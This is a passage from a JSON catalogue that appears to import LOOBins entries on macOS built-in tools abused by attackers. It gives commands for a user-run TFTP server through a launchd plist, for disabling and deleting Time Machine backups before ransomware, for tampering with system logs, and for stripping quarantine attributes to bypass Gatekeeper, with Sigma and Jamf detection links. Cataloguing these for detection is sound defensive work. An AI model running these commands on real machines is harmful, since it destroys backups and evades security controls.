"https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp", 7475 "https://attack.mitre.org/techniques/T1105/", 7476 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 7477 ] 7478 }, 7479 { 7480 "id": "loobins:tftp:bc764b7dca517eae", 7481 "toolId": "loobins:tftp", 7482 "toolName": "tftp", 7483 "name": "Run unprivileged TFTP server on a non-standard port", 7484 "source": "LOOBins", 7485 "platform": [ 7486 "macOS" 7487 ], 7488 "capability": [ 7489 "Lateral Movement", 7490 "Defense Evasion", 7491 "Persistence" 7492 ], 7493 "nativeCategory": [ 7494 "Lateral Movement", 7495 "Defense Evasion", 7496 "Persistence" 7497 ], 7498 "command": "mkdir -p /tmp/tftp_server && chmod 777 /tmp/tftp_server\ntee /tmp/com.user.tftp.plist > /dev/null << 'EOF'\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>Label</key>\n <string>com.user.tftp</string>\n <key>WorkingDirectory</key>\n <string>/tmp/tftp_server</string>\n <key>ProgramArguments</key>\n <array>\n <string>/usr/libexec/tftpd</string>\n <string>-w</string>\n <string>-l</string>\n <string>-u</string>\n <string>$(whoami)</string>\n </array>\n <key>inetdCompatibility</key>\n <dict>\n <key>Wait</key>\n <true/>\n </dict>\n <key>Sockets</key>\n <dict>\n <key>Listeners</key>\n <dict>\n <key>SockServiceName</key>\n <string>6969</string>\n <key>SockType</key>\n <string>dgram</string>\n <key>SockFamily</key>\n <string>IPv4</string>\n </dict>\n </dict>\n</dict>\n</plist>\nEOF\nlaunchctl load -w /tmp/com.user.tftp.plist", 7499 "description": "Without root access, tftpd can be loaded from a user-created launchd plist stored anywhere on disk (e.g., /tmp). Passing the -w flag allows tftpd to create new files on write, removing the placeholder requirement. The server can be bound to any unprivileged port.", 7500 "mitre": [], 7501 "fullPath": [ 7502 "/usr/bin/tftp", 7503 "/usr/libexec/tftpd" 7504 ], 7505 "environment": [ 7506 "Local host" 7507 ], 7508 "availability": "Built in", 7509 "verification": "Upstream reference", 7510 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7511 "detection": [ 7512 { 7513 "type": "No detections at time of publishing", 7514 "value": "No detections at time of publishing" 7515 } 7516 ], 7517 "references": [ 7518 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml", 7519 "https://ss64.com/mac/tftp.html", 7520 "https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp", 7521 "https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp", 7522 "https://attack.mitre.org/techniques/T1105/", 7523 "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" 7524 ] 7525 }, 7526 { 7527 "id": "loobins:tmutil:00548da211e6bb02", 7528 "toolId": "loobins:tmutil", 7529 "toolName": "tmutil", 7530 "name": "Disable Time Machine", 7531 "source": "LOOBins", 7532 "platform": [ 7533 "macOS" 7534 ], 7535 "capability": [], 7536 "nativeCategory": [ 7537 "Impact" 7538 ], 7539 "command": "tmutil disable", 7540 "description": "The following command disables Time Machine. An attacker can use this to prevent backups from occurring.", 7541 "mitre": [], 7542 "fullPath": [ 7543 "/usr/bin/tmutil" 7544 ], 7545 "environment": [ 7546 "Local host" 7547 ], 7548 "availability": "Built in", 7549 "verification": "Upstream reference", 7550 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7551 "detection": [ 7552 { 7553 "type": "Jamf Protect: Detect the deletion of localsnapshots", 7554 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" 7555 }, 7556 { 7557 "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", 7558 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" 7559 }, 7560 { 7561 "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", 7562 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" 7563 }, 7564 { 7565 "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", 7566 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" 7567 } 7568 ], 7569 "references": [ 7570 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", 7571 "https://theevilbit.github.io/posts/cve_2020_9771/", 7572 "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", 7573 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" 7574 ] 7575 }, 7576 { 7577 "id": "loobins:tmutil:597a7c20b410d2a8", 7578 "toolId": "loobins:tmutil", 7579 "toolName": "tmutil", 7580 "name": "Delete a backup", 7581 "source": "LOOBins", 7582 "platform": [ 7583 "macOS" 7584 ], 7585 "capability": [], 7586 "nativeCategory": [ 7587 "Impact" 7588 ], 7589 "command": "tmutil delete /path/to/backup", 7590 "description": "The following command deletes the specified backup. An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.", 7591 "mitre": [], 7592 "fullPath": [ 7593 "/usr/bin/tmutil" 7594 ], 7595 "environment": [ 7596 "Local host" 7597 ], 7598 "availability": "Built in", 7599 "verification": "Upstream reference", 7600 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7601 "detection": [ 7602 { 7603 "type": "Jamf Protect: Detect the deletion of localsnapshots", 7604 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" 7605 }, 7606 { 7607 "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", 7608 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" 7609 }, 7610 { 7611 "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", 7612 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" 7613 }, 7614 { 7615 "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", 7616 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" 7617 } 7618 ], 7619 "references": [ 7620 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", 7621 "https://theevilbit.github.io/posts/cve_2020_9771/", 7622 "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", 7623 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" 7624 ] 7625 }, 7626 { 7627 "id": "loobins:tmutil:8e499d87e4d49768", 7628 "toolId": "loobins:tmutil", 7629 "toolName": "tmutil", 7630 "name": "Restore a backup", 7631 "source": "LOOBins", 7632 "platform": [ 7633 "macOS" 7634 ], 7635 "capability": [ 7636 "Collection" 7637 ], 7638 "nativeCategory": [ 7639 "Collection" 7640 ], 7641 "command": "tmutil restore /path/to/backup", 7642 "description": "The following command restore the specified backup. An attacker can use this to restore a backup of a sensitive file that was deleted.", 7643 "mitre": [], 7644 "fullPath": [ 7645 "/usr/bin/tmutil" 7646 ], 7647 "environment": [ 7648 "Local host" 7649 ], 7650 "availability": "Built in", 7651 "verification": "Upstream reference", 7652 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7653 "detection": [ 7654 { 7655 "type": "Jamf Protect: Detect the deletion of localsnapshots", 7656 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" 7657 }, 7658 { 7659 "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", 7660 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" 7661 }, 7662 { 7663 "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", 7664 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" 7665 }, 7666 { 7667 "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", 7668 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" 7669 } 7670 ], 7671 "references": [ 7672 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", 7673 "https://theevilbit.github.io/posts/cve_2020_9771/", 7674 "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", 7675 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" 7676 ] 7677 }, 7678 { 7679 "id": "loobins:tmutil:13d81191962d0f5c", 7680 "toolId": "loobins:tmutil", 7681 "toolName": "tmutil", 7682 "name": "Tamper with system logs", 7683 "source": "LOOBins", 7684 "platform": [ 7685 "macOS" 7686 ], 7687 "capability": [ 7688 "Privilege Escalation" 7689 ], 7690 "nativeCategory": [ 7691 "Privilege Escalation" 7692 ], 7693 "command": "mkdir /tmp/snapshot\ntmutil localsnapshot\ntmutil listlocalsnapshots /\nmount_apfs -o noowners -s com.apple.TimeMachine.2023-05-01-090000.local /System/Volumes/Data /tmp/snapshot\nopen /tmp/snapshot\nsudo vim /var/log/system.log\ntmutil restore com.apple.TimeMachine.2023-05-01-090000.local", 7694 "description": "An adversary can use the snapshot and restore commands together to tamper with system logs. This is fixed in macOS 10.15.4+.", 7695 "mitre": [], 7696 "fullPath": [ 7697 "/usr/bin/tmutil" 7698 ], 7699 "environment": [ 7700 "Local host" 7701 ], 7702 "availability": "Built in", 7703 "verification": "Upstream reference", 7704 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7705 "detection": [ 7706 { 7707 "type": "Jamf Protect: Detect the deletion of localsnapshots", 7708 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" 7709 }, 7710 { 7711 "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", 7712 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" 7713 }, 7714 { 7715 "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", 7716 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" 7717 }, 7718 { 7719 "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", 7720 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" 7721 } 7722 ], 7723 "references": [ 7724 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", 7725 "https://theevilbit.github.io/posts/cve_2020_9771/", 7726 "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", 7727 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" 7728 ] 7729 }, 7730 { 7731 "id": "loobins:tmutil:934af9b671652c59", 7732 "toolId": "loobins:tmutil", 7733 "toolName": "tmutil", 7734 "name": "Exclude path from backup", 7735 "source": "LOOBins", 7736 "platform": [ 7737 "macOS" 7738 ], 7739 "capability": [ 7740 "Defense Evasion" 7741 ], 7742 "nativeCategory": [ 7743 "Defense Evasion" 7744 ], 7745 "command": "tmutil addexclusion /path/to/exclude", 7746 "description": "An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.", 7747 "mitre": [], 7748 "fullPath": [ 7749 "/usr/bin/tmutil" 7750 ], 7751 "environment": [ 7752 "Local host" 7753 ], 7754 "availability": "Built in", 7755 "verification": "Upstream reference", 7756 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7757 "detection": [ 7758 { 7759 "type": "Jamf Protect: Detect the deletion of localsnapshots", 7760 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity" 7761 }, 7762 { 7763 "type": "Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS", 7764 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml" 7765 }, 7766 { 7767 "type": "Sigma: Time Machine Backup Disabled Via Tmutil - MacOS", 7768 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" 7769 }, 7770 { 7771 "type": "Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS", 7772 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml" 7773 } 7774 ], 7775 "references": [ 7776 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml", 7777 "https://theevilbit.github.io/posts/cve_2020_9771/", 7778 "https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html", 7779 "https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd" 7780 ] 7781 }, 7782 { 7783 "id": "loobins:xattr:94a0b1454bdcb216", 7784 "toolId": "loobins:xattr", 7785 "toolName": "xattr", 7786 "name": "Bypass Gatekeeper via xattr", 7787 "source": "LOOBins", 7788 "platform": [ 7789 "macOS" 7790 ], 7791 "capability": [ 7792 "Execution", 7793 "Defense Evasion" 7794 ], 7795 "nativeCategory": [ 7796 "Execution", 7797 "Defense Evasion" 7798 ], 7799 "command": "xattr -d com.apple.quarantine FILE", 7800 "description": "Use xattr to remove quarantine extended attribute from a file.", 7801 "mitre": [], 7802 "fullPath": [ 7803 "/usr/bin/xattr" 7804 ], 7805 "environment": [ 7806 "Local host" 7807 ], 7808 "availability": "Built in", 7809 "verification": "Upstream reference", 7810 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7811 "detection": [ 7812 { 7813 "type": "Gatekeeper Bypass via Xattr", 7814 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" 7815 }, 7816 { 7817 "type": "Jamf Protect: Detect activity related to xattr and extended attributes", 7818 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity" 7819 } 7820 ], 7821 "references": [ 7822 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml", 7823 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 7824 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be" 7825 ] 7826 }, 7827 { 7828 "id": "loobins:xattr:3110f6b06aa87ef5", 7829 "toolId": "loobins:xattr", 7830 "toolName": "xattr", 7831 "name": "Bypass Gatekeeper via xattr", 7832 "source": "LOOBins", 7833 "platform": [ 7834 "macOS" 7835 ], 7836 "capability": [ 7837 "Execution", 7838 "Defense Evasion" 7839 ], 7840 "nativeCategory": [ 7841 "Execution", 7842 "Defense Evasion" 7843 ], 7844 "command": "xattr -d -r com.apple.quarantine *", 7845 "description": "Use xattr to remove quarantine extended attribute from multiple files or directories.", 7846 "mitre": [], 7847 "fullPath": [ 7848 "/usr/bin/xattr" 7849 ], 7850 "environment": [ 7851 "Local host" 7852 ], 7853 "availability": "Built in", 7854 "verification": "Upstream reference", 7855 "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", 7856 "detection": [ 7857 { 7858 "type": "Gatekeeper Bypass via Xattr", 7859 "value": "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" 7860 }, 7861 { 7862 "type": "Jamf Protect: Detect activity related to xattr and extended attributes", 7863 "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity" 7864 } 7865 ], 7866 "references": [ 7867 "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml", 7868 "https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf", 7869 "https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be" 7870 ] 7871 } 7872 ] 7873 }